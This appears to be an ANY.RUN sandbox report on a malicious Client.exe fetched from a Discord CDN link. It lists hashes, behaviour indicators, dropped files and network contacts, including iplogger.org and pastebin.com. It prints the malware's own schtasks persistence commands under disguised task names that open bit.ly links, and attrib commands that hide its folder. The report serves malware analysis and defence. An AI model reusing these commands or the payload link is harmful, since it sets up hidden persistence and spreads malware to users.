URL:

https://cdn.discordapp.com/attachments/772868922189676576/870066996329455666/Client.exe

Full analysis: https://app.any.run/tasks/c45e71fc-5bb5-442d-b316-393489a3c0b3
Verdict: Malicious activity
Analysis date: July 28, 2021, 22:15:44
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
evasion
Indicators:
MD5:

BD61E9250229F0D5E5988547B9C9C8BE

SHA1:

421AD3B908B9AC7D424F3E451D14001300F63D19

SHA256:

FEE77D173418891DC076BC592170D52211B3E32E9AA6DA0E3A4F2D672ECE3B34

SSDEEP:

3:N8cCWdy6//hXRmTVSJsc55lLNn:2cry6XhqQRNn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Client.exe (PID: 2664)
      • chromes.exe (PID: 2424)
      • chromes.exe (PID: 2960)
    • Uses Task Scheduler to run other applications

      • Client.exe (PID: 2664)
      • cmd.exe (PID: 1196)
      • cmd.exe (PID: 2580)
      • chromes.exe (PID: 2424)
    • Changes the Startup folder

      • Client.exe (PID: 2664)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3884)
      • schtasks.exe (PID: 2604)
      • schtasks.exe (PID: 3768)
      • schtasks.exe (PID: 660)
  • SUSPICIOUS

    • Reads Microsoft Outlook installation path

      • iexplore.exe (PID: 2984)
    • Executable content was dropped or overwritten

      • iexplore.exe (PID: 2984)
      • iexplore.exe (PID: 4024)
      • Client.exe (PID: 2664)
    • Checks supported languages

      • Client.exe (PID: 2664)
      • cmd.exe (PID: 3916)
      • cmd.exe (PID: 1196)
      • cmd.exe (PID: 2580)
      • chromes.exe (PID: 2424)
      • cmd.exe (PID: 3380)
      • chromes.exe (PID: 2960)
    • Creates files in the user directory

      • Client.exe (PID: 2664)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • Client.exe (PID: 2664)
    • Reads the computer name

      • Client.exe (PID: 2664)
      • chromes.exe (PID: 2424)
      • chromes.exe (PID: 2960)
    • Starts CMD.EXE for commands execution

      • Client.exe (PID: 2664)
      • chromes.exe (PID: 2424)
    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 3916)
      • cmd.exe (PID: 3380)
    • Reads Environment values

      • Client.exe (PID: 2664)
      • chromes.exe (PID: 2424)
    • Creates files in the program directory

      • Client.exe (PID: 2664)
    • Executed via Task Scheduler

      • chromes.exe (PID: 2960)
    • Starts itself from another location

      • Client.exe (PID: 2664)
  • INFO

    • Checks supported languages

      • iexplore.exe (PID: 4024)
      • iexplore.exe (PID: 2984)
      • schtasks.exe (PID: 3884)
      • schtasks.exe (PID: 2604)
      • schtasks.exe (PID: 3768)
      • attrib.exe (PID: 2500)
      • attrib.exe (PID: 3788)
      • schtasks.exe (PID: 660)
      • attrib.exe (PID: 3728)
      • attrib.exe (PID: 2732)
    • Reads the computer name

      • iexplore.exe (PID: 4024)
      • schtasks.exe (PID: 3884)
      • iexplore.exe (PID: 2984)
      • schtasks.exe (PID: 2604)
      • schtasks.exe (PID: 3768)
      • schtasks.exe (PID: 660)
    • Application launched itself

      • iexplore.exe (PID: 4024)
    • Checks Windows Trust Settings

      • iexplore.exe (PID: 4024)
      • iexplore.exe (PID: 2984)
    • Reads the date of Windows installation

      • iexplore.exe (PID: 4024)
    • Reads settings of System Certificates

      • iexplore.exe (PID: 4024)
      • iexplore.exe (PID: 2984)
      • Client.exe (PID: 2664)
      • chromes.exe (PID: 2424)
    • Reads internet explorer settings

      • iexplore.exe (PID: 2984)
    • Modifies the phishing filter of IE

      • iexplore.exe (PID: 4024)
    • Changes internet zones settings

      • iexplore.exe (PID: 4024)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
57
Monitored processes
17
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start iexplore.exe iexplore.exe client.exe schtasks.exe no specs cmd.exe no specs attrib.exe no specs attrib.exe no specs cmd.exe no specs cmd.exe no specs schtasks.exe no specs schtasks.exe no specs chromes.exe schtasks.exe no specs cmd.exe no specs attrib.exe no specs attrib.exe no specs chromes.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
660schtasks /create /f /sc MINUTE /mo 1 /RL LIMITED /tn UpdateDMR /tr "'C:\ProgramData\apppatch\chromes.exe'"C:\Windows\system32\schtasks.exechromes.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
1196cmd /C schtasks /create /f /st "08:38" /sc daily /mo "24" /tn "Data Integrity Scan for Crash Recovery" /tr "'explorer'http://bit.ly/2PXKDIt"C:\Windows\system32\cmd.exeClient.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2424"C:\ProgramData\apppatch\chromes.exe" C:\ProgramData\apppatch\chromes.exe
Client.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Exit code:
0
Version:
2.1.0.0
Modules
Images
c:\programdata\apppatch\chromes.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
2500attrib +H +S +R "C:\ProgramData\\apppatch" C:\Windows\system32\attrib.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Attribute Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\attrib.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ulib.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\usp10.dll
2580cmd /C schtasks /create /f /st "21:58" /sc monthly /m "apr" /tn "TempSignedLicenseExchange" /tr "'explorer'http://bit.ly/2vTipYY"C:\Windows\system32\cmd.exeClient.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2604schtasks /create /f /st "08:38" /sc daily /mo "24" /tn "Data Integrity Scan for Crash Recovery" /tr "'explorer'http://bit.ly/2PXKDIt"C:\Windows\system32\schtasks.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\ole32.dll
c:\windows\system32\usp10.dll
2664"C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\78RFYB7Z\Client.exe" C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\78RFYB7Z\Client.exe
iexplore.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Exit code:
0
Version:
2.1.0.0
Modules
Images
c:\users\admin\appdata\local\microsoft\windows\temporary internet files\content.ie5\78rfyb7z\client.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
2732attrib +H +S +R "C:\ProgramData\\apppatch\*" /S /DC:\Windows\system32\attrib.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Attribute Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\attrib.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ulib.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2960C:\ProgramData\apppatch\chromes.exe C:\ProgramData\apppatch\chromes.exetaskeng.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Exit code:
0
Version:
2.1.0.0
Modules
Images
c:\programdata\apppatch\chromes.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
2984"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:4024 CREDAT:267521 /prefetch:2C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\program files\internet explorer\iexplore.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\sechost.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\rpcrt4.dll
Total events
22 521
Read events
22 337
Write events
183
Delete events
1

Modification events

(PID) Process:(4024) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
Operation:writeName:NTPDaysSinceLastAutoMigration
Value:
1
(PID) Process:(4024) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
Operation:writeName:NTPLastLaunchLowDateTime
Value:
642499184
(PID) Process:(4024) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
Operation:writeName:NTPLastLaunchHighDateTime
Value:
30901246
(PID) Process:(4024) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
Operation:writeName:NextCheckForUpdateLowDateTime
Value:
942661996
(PID) Process:(4024) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
Operation:writeName:NextCheckForUpdateHighDateTime
Value:
30901246
(PID) Process:(4024) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(4024) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(4024) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(4024) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Operation:writeName:CompatibilityFlags
Value:
0
(PID) Process:(4024) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
Executable files
4
Suspicious files
9
Text files
7
Unknown types
7

Dropped files

PID
Process
Filename
Type
4024iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157binary
MD5:
SHA256:
2984iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27binary
MD5:
SHA256:
2984iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27der
MD5:
SHA256:
4024iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFF7184E42AC22E5FB.TMPgmc
MD5:
SHA256:
2984iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\DY534W2X\Client[1].exeexecutable
MD5:
SHA256:
4024iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{6D5E0CA6-EFF1-11EB-97B3-12A9866C77DE}.datbinary
MD5:
SHA256:
4024iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{63EEDE87-EFF1-11EB-97B3-12A9866C77DE}.datbinary
MD5:
SHA256:
2984iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\78RFYB7Z\Client.exe.8or3uym.partialexecutable
MD5:
SHA256:
4024iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63der
MD5:
SHA256:
4024iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63binary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
20
DNS requests
15
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4024
iexplore.exe
GET
200
72.21.91.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8Ull8gIGmZT9XHrHiJQeI%3D
US
der
1.47 Kb
whitelisted
2984
iexplore.exe
GET
200
72.21.91.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAo3h2ReX7SMIk79G%2B0UDDw%3D
US
der
1.47 Kb
whitelisted
2664
Client.exe
GET
200
142.250.186.163:80
http://www.google.ru/
US
html
14.4 Kb
whitelisted
4024
iexplore.exe
GET
200
72.21.91.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
US
der
471 b
whitelisted
4024
iexplore.exe
GET
200
2.16.186.34:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?b135ca07300464d1
unknown
compressed
4.70 Kb
whitelisted
4024
iexplore.exe
GET
200
2.16.186.34:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?dfd77e676993d391
unknown
compressed
4.70 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2984
iexplore.exe
162.159.129.233:443
cdn.discordapp.com
Cloudflare Inc
shared
4024
iexplore.exe
204.79.197.200:443
www.bing.com
Microsoft Corporation
US
whitelisted
4024
iexplore.exe
2.16.186.34:80
ctldl.windowsupdate.com
Akamai International B.V.
whitelisted
4024
iexplore.exe
72.21.91.29:80
ocsp.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
2984
iexplore.exe
162.159.135.233:443
cdn.discordapp.com
Cloudflare Inc
shared
2984
iexplore.exe
72.21.91.29:80
ocsp.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
4024
iexplore.exe
152.199.19.161:443
iecvlist.microsoft.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
2664
Client.exe
88.99.66.31:443
iplogger.org
Hetzner Online GmbH
DE
malicious
2664
Client.exe
142.250.186.163:80
www.google.ru
Google Inc.
US
whitelisted
2424
chromes.exe
104.23.99.190:443
pastebin.com
Cloudflare Inc
US
malicious

DNS requests

Domain
IP
Reputation
cdn.discordapp.com
  • 162.159.129.233
  • 162.159.135.233
  • 162.159.130.233
  • 162.159.134.233
  • 162.159.133.233
shared
api.bing.com
  • 13.107.5.80
whitelisted
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
ctldl.windowsupdate.com
  • 2.16.186.34
  • 2.16.186.27
  • 2.16.186.33
  • 2.16.186.25
whitelisted
ocsp.digicert.com
  • 72.21.91.29
whitelisted
iecvlist.microsoft.com
  • 152.199.19.161
whitelisted
r20swj13mr.microsoft.com
  • 152.199.19.161
whitelisted
iplogger.org
  • 88.99.66.31
shared
www.google.ru
  • 142.250.186.163
whitelisted
pastebin.com
  • 104.23.99.190
  • 104.23.98.190
malicious

Threats

Found threats are available for the paid subscriptions
2 ETPRO signatures available at the full report
No debug info